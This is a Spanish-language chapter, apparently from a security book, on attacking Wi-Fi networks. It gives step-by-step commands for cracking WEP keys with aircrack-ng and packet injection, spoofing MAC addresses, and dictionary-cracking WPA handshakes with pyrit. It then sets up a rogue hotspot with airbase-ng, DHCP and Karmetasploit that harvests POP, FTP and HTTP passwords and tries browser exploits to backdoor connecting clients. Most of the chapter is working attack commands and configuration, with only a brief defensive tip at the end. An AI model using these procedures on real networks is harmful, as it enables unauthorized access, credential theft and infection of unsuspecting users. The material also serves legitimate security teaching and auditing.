Fallos Wi-Fi

Hemos visto proliferar desde principios de la dcada del 2000 nuevos soportes inalmbricos para
nuestras redes: el estndar Wi-Fi se ha impuesto. Las ondas no se detienen en las puertas ni en las
ventanas, la seguridad en este tipo de redes se limita entonces al cifrado.
Imaginemos un fallo en este tipo de sistema! Sera necesario actualizar todo el parque de equipos para
aceptar un nuevo sistema de cifrado, pero qu pasa con el hardware? En algunos casos basta con
actualizar el firmware, pero no siempre es posible.
Muchas redes no tienen seguridad alguna, otras que tienen WEP (Wired Equivalent Privacy) pueden ser
crackeadas rpidamente. La combinacin WPA2 + Servidor de autentificacin Radius parece ser una
buena solucin en el momento de escribir de este libro, pero aun as infrmese sobre este tema, ya que
las tecnologas evolucionan rpidamente!

1. Crackear una red con cifrado WEP

Aircrack es un conjunto de herramientas que nos permite crackear redes Wi-Fi.
Para instalar en Debian aircrack-ng:apt-get install aircrack-ng

Capturar paquetes
Para obtener la clave WEP, tenemos que capturar paquetes. Partiremos de las siguientes suposiciones
para el ejemplo:
Nuestra interfaz de red se llama wlan0.
El nombre de la red (ESSID) es ENI.
La direccin MAC del punto de acceso Wi-Fi es: 00:11:22:33:44:55.
La direccin MAC del ordenador cliente es: 00:00:00:00:00:01.
Para saber el nombre de su interfaz, utilice el comando iwconfig.
airodump-ng --write captura1 wlan0
Airodump es un programa que le permite capturar paquetes Wi-Fi.
Para este ejemplo, los paquetes se capturan desde la interfaz wlan0 y se guardan en el archivo
captura1.cap. Tendremos un archivo (captura1.txt) con informacin til como por ejemplo los clientes
conectados, las direcciones MAC...

CH 10 ][ Elapsed: 3 mins ][ 2009-02-13 12:23

BSSID
4A:9A:6D:77:83:49
00:18:E7:23:A5:DD
62:BA:70:71:55:2F
BSSID

PWR Beacons #Data, #/s CH MB

0
0
0

176
0
0

1
0
0

STATION

4A:9A:6D:77:82:62 00:23:DF:26:82:23
(not associated) 00:09:2D:81:98:62
(not associated) 00:1E:58:95:AB:AB

0
0
0

ENC CIPHER AUTH ESSID

1 54e OPN
FreeWifi
6 54e. WPA TKIP PSK Livebox-31B6
1 54e WPA TKIP MGT freephone
PWR

Rate

0
0
0

54e- 1
0-1
0-2

Lost Packets Probes

0
0
0

7
22 ENI
3

(not associated)

00:23:4D:29:7F:2E

0-1

4 link

Para optimizar al mximo la captura, podemos especificar un canal, mediante la opcin --channel y la
direccin MAC del punto de acceso Wi-Fi: --bssid.

Generar trfico
Para obtener la clave, son necesarios muchos paquetes, por lo menos 400.000 para una clave WEP de
64 bits y 1.200.000 para una clave WEP de 128 bits. Si no hay nadie conectado a la red, esta operacin
puede durar semanas.
Vamos a tener que inyectar trfico para alcanzar nuestro objetivo. Esta tarea es opcional, pero nos
permitir acelerar considerablemente la operacin de cracking si no hay trfico o si el que hay es muy
poco.
Por lo tanto su interfaz deber aceptar el modo de inyeccin. Puede consultar la lista de
compatibilidad en el sitio web de aircrack: http://www.aircrack-ng.org

Aireplay permite realizar varios ataques:

-0: Desautentificacin, desconecta clientes
-1: Falsa autentificacin
-2: Reinyeccin de paquetes
-3: Inyeccin de peticiones ARP
-4: Ataque ChopChop
-5: Ataque por fragmentacin
-6: Caffe Latte
-7: Cfrag
-z: PTW attack
man airecrack-ng nos permitir descubrir todas las posibilidades que nos ofrece esta herramienta.
En primer lugar, vamos a generar una falsa autentificacin:
aireplay-ng -1 0 -e ENI -a 00:11:22:33:44:55
-h 00:00:00:00:00:01 wlan0
Es posible que haya un filtro activo por MAC. En este caso, utilice la direccin MAC de un equipo
que est conectado a la red, si no, este procedimiento fallar. Si comprueba que el nmero de
paquetes capturados no aumenta, genere falsas autentificaciones regularmente para
autentificarse de nuevo. No todas las interfaces de red y controladores Wi-Fi son compatibles con
la inyeccin. Puede comprobar la compatibilidad de su interfaz de red en el sitio web oficial de
aircrack: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Generamos un ataque de tipo inyeccin de peticin ARP:

aireplay-ng -3 -e ENI -b 00:11:22:33:44:55
-h 00:00:00:00:00:01 wlan0

Una vez que aireplay inyecte paquetes, vamos a ver un incremento neto en Airodump.

Encontrar la clave
Ejecutamos aircrack mediante el comando:
aircrack-ng captura1.cap

Si aircrack no es capaz de averiguar la clave, ser necesario capturar ms paquetes y volverlo a

intentar ms adelante.
La siguiente imagen muestra la finalidad del ataque: encontrar la clave. En este caso es 0327466969 y
se ha encontrado con algo menos de 47000 paquetes. El ataque PTW se ha aadido recientemente a
aircrack y reduce significativamente el nmero necesario de IVs (PTW viene de Andrei Pyshkin,
Erik Tews y Ralf-Philipp Weinmann, los tres autores del artculo que da a conocer un nuevo mtodo de
ataque WEP gracias a la correlacin del generador pseudo-aleatorio en el algoritmo de cifrado).

Clave encontrada con 47000 paquetes mediante PTW

Si el filtrado de MAC est activado, basta con instalar macchanger, mediante el comando:

apt-get install macchanger

Para cambiar su direccin MAC:

macchanger -m 00:00:00:00:00:01 wlan0

2. Crackear WPA
El crack WPA est menos avanzado que el WEP. Sin embargo, se puede cazar la contrasea por
diccionario. La eleccin del diccionario y de su mtodo de generacin es por lo tanto primordial para
tener xito en este ataque.
Vamos a utilizar pyrit, un programa en Python que tiene la ventaja de poderse usar en clster
permitiendo de este modo utilizar la potencia de las GPU.
Descarguemos los fuentes de pyrit usando svn:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit
Despus, las herramientas para la compilacin:
sudo apt-get install libssl-dev python python-dev
Compilamos e instalamos pyrit:
python setup.py build
sudo python setup.py install
Vamos a empezar importando la lista de claves candidatas en una base de datos pyrit:
pyrit -i dict.gz import_passwords

Ahora vamos a importar los distintos ESSID, por ejemplo el ESSID linksys:
pyrit -e linksys create_essid
El siguiente comando combina las contraseas con los distintos ESSID para generar PMK
candidatos:
pyrit batch
Este procedimiento es el ms largo. Lo que hace realmente, claro est, es generar los distintos PMK
mediante un producto cartesiano (clave, essid).
Para generar cada PMK, pyrit utiliza la funcin PBKDF2 (passphrase, salt, saltLength, 4096, 256) de
PKCS #5 v2.0 pasando como argumentos la clave y el ESSID. Este ltimo representa "su baza" o salt
en ingls.
La funcin PBKDF2 es lenta por definicin, un procesador core2duo puede llegar a realizar 600 PMK por
segundo.
Se pueden usar los ltimos procesadores o incluso FPGA. Sin embargo, las GPU parecen ser la solucin
por un presupuesto ms que razonable.
Gracias a las ltimas tarjetas Nvidia con la tecnologa CUDA, es posible alcanzar 89000 PMK/s con 4
GeForce en paralelo.
Procedemos a capturar con airodump para obtener un archivo .cap:
airodump-ng --write wpapskcaptura.cap wlan0.
Slo nos falta realizar el crack:
pyrit -r wpapskcaptura.cap attack_db
En el momento de escribir este libro es posible romper una clave de 8 caracteres, pero la tcnica
evoluciona rpidamente, as como el hardware, especialmente las tarjetas grficas. Tambin es factible
capturar el protocolo WPA como sucede con el WEP.
Este campo est muy activo, por lo que hay que ir siguindolo de cerca.

3. Rogue AP
a. Introduccin
Si es complejo crackear una clave WPA, es ms asequible aprovecharse de la nueva oleada de puntos
de acceso para crear uno.
Los hotspots son routers Wi-Fi que permiten a usuarios nmadas tener una conexin a Internet.
Estn por todas partes, en la mayora de los restaurantes de comida rpida, universidades, incluso
los hay en urbanizaciones.
Un hotspot no tiene clave WEP o WPA y la mayora de los usuarios intentan conectarse para acceder
a Internet de forma gratuita.
Los Rogues AP son por lo tanto falsos "routers Wi-Fi", en general hotspots, que recuperan todas las

contraseas que pueden y, si pueden, intentarn instalar una backdoor en los ordenadores cliente.
Como es posible ver los clientes conectados mediante la herramienta aircrack as como autentificar un
cliente, se los puede redirigir al Rogue AP.

b. Despliegue de un Rogue AP con Karmetasploit

Vamos a necesitar un PC y una tarjeta Wi-Fi que permita inyectar paquetes para crear un punto de
acceso con ella. Si no tiene, puede usar un router Wi-Fi conectado a su PC, en este caso tendr que
adaptar las manipulaciones.
En primer lugar, necesitamos instalar un servidor DHCP que nos permitir configurar automticamente
las IP de los clientes como un verdadero router Wi-Fi.

apt-get install dhcp3-server

He aqu la configuracin del servidor dhcp: /etc/dhcp3/dhcpd.conf

option T150 code 150 = string;

deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}
Vamos a necesitar Aircrack-ng, compruebe que se haya instalado correctamente. Si no es as,
se ha explicado cmo instalarlo en la seccin Crackear una red con cifrado WEP de este
captulo.

Pasamos la interfaz Wi-Fi a modo monitor:

airmon-ng start wlan0
Este comando va a crear una nueva interfaz mon0, que soportar la inyeccin.
Vamos a crear ahora el hotspot:
airbase-ng -P -C 30 -e "Hotspot WiFi" -v mon0
-e es el ESSID de la red. Se puede personalizar el canal Wi-Fi e incluso la direccin MAC del
punto de acceso.

Ahora hay que configurar la direccin IP fija de nuestro punto de acceso.

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

Ya estamos en condiciones de poder arrancar el servidor DHCP.
/etc/init.d/dhcp3-server restart
Hemos creado hasta ahora un punto de acceso funcional que permite navegar por la red. A
continuacin vamos a crear la parte "rogue".
Para ello, vamos a usar Karmetasploit que es, de hecho, la asociacin de Karma y Metasploit.
Obtenemos la ltima versin de metasploit con el comando:
svn co http://metasploit.com/svn/framework3/trunk msf3
Descargamos karma.rc
wget http://digitaloffense.net/tools/karma.rc
Slo nos falta ejecutar Karmetasploit:

./msfconsole -r karma.rc
Utilice uno de nuestros PCs para conectarse a su Rogue AP.
Una vez se haya conectado, navegue por Internet.

Rogue AP en accin en un cliente

El Rogue AP, con esta configuracin, buscar la forma de infectar su mquina mediante autoPWN, un
servidor HTTP est en ejecucin para intentar un exploit en su navegador web favorito. Karmetasploit
tambin est configurado para recuperar sus contraseas POP, FTP y HTTP.

Todo lo que circule quedar registrado en un archivo .cap, el cual puede analizarse con Wireshark o
tambin con la base de datos SQLite karma.db.
Por Internet abundan los llamados "fake AP". Se trata de copias validadas de hotspots de ISPs. La
nica regla para defenderse es la de nunca confiar en ningn hotspot. No dude en utilizar tneles VPN
o SSH.